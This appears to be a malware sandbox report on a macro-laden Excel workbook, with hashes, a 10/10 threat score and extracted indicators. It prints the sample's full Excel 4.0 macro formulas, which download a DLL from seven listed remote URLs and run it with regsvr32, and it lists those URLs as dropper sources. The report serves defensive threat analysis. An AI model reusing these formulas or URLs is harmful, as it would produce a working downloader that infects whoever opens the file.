Overview

overview

10

Static

static

10

146232681d...e.xlsm

windows7-x64

10

146232681d...e.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    146232681def5a2f77ed65e8f098ed5cda6e4a4d2982d6f22395b3f8e860ccae

  • Size

    32KB

  • Sample

    241119-waeewsymhs

  • MD5

    9831d54e84b419170c2b3925a977f4d6

  • SHA1

    f7121383166b8a11cf17d2a93baac76245078dd6

  • SHA256

    146232681def5a2f77ed65e8f098ed5cda6e4a4d2982d6f22395b3f8e860ccae

  • SHA512

    b9d3b8f3edd86e93ba1c34c24ce75d6f2a45aa63268b6771a4f630deb1ae7ddcec40f3753f6705a2028bac82a87a69d54ab7e447afea7d08a82a348b1f3cefad

  • SSDEEP

    384:sjzZPFhNjqEBOA7iEibbwBLg0SCdiVXUKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5lY:sjpFhNNlizXT28dFfPdkqstJmE6/

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://casache.com/web/n3jxwXXwa/

https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/

http://ccalaire.com/wp-admin/d1pGRa0X/

http://cdimprintpr.com/brochure2/A9NmYDndZ/

http://careerplan.host20.uk/images/Ls/

http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/

https://azsiacenter.com/js/sOhmiosLJOgwaP6i5nln/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://casache.com/web/n3jxwXXwa/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ccalaire.com/wp-admin/d1pGRa0X/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://cdimprintpr.com/brochure2/A9NmYDndZ/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://careerplan.host20.uk/images/Ls/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://azsiacenter.com/js/sOhmiosLJOgwaP6i5nln/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://casache.com/web/n3jxwXXwa/
xlm40.dropper

https://www.blessingsource.com/blessingsource.com/rFQ0Ip6lQXXK/
xlm40.dropper

http://ccalaire.com/wp-admin/d1pGRa0X/
xlm40.dropper

http://cdimprintpr.com/brochure2/A9NmYDndZ/
xlm40.dropper

http://careerplan.host20.uk/images/Ls/
xlm40.dropper

http://ausnz.net/2010wc/odSi5tQKkCIXEWl9/

Targets

    • Target

      146232681def5a2f77ed65e8f098ed5cda6e4a4d2982d6f22395b3f8e860ccae

    • Size

      32KB

    • MD5

      9831d54e84b419170c2b3925a977f4d6

    • SHA1

      f7121383166b8a11cf17d2a93baac76245078dd6

    • SHA256

      146232681def5a2f77ed65e8f098ed5cda6e4a4d2982d6f22395b3f8e860ccae

    • SHA512

      b9d3b8f3edd86e93ba1c34c24ce75d6f2a45aa63268b6771a4f630deb1ae7ddcec40f3753f6705a2028bac82a87a69d54ab7e447afea7d08a82a348b1f3cefad

    • SSDEEP

      384:sjzZPFhNjqEBOA7iEibbwBLg0SCdiVXUKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5lY:sjpFhNNlizXT28dFfPdkqstJmE6/

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks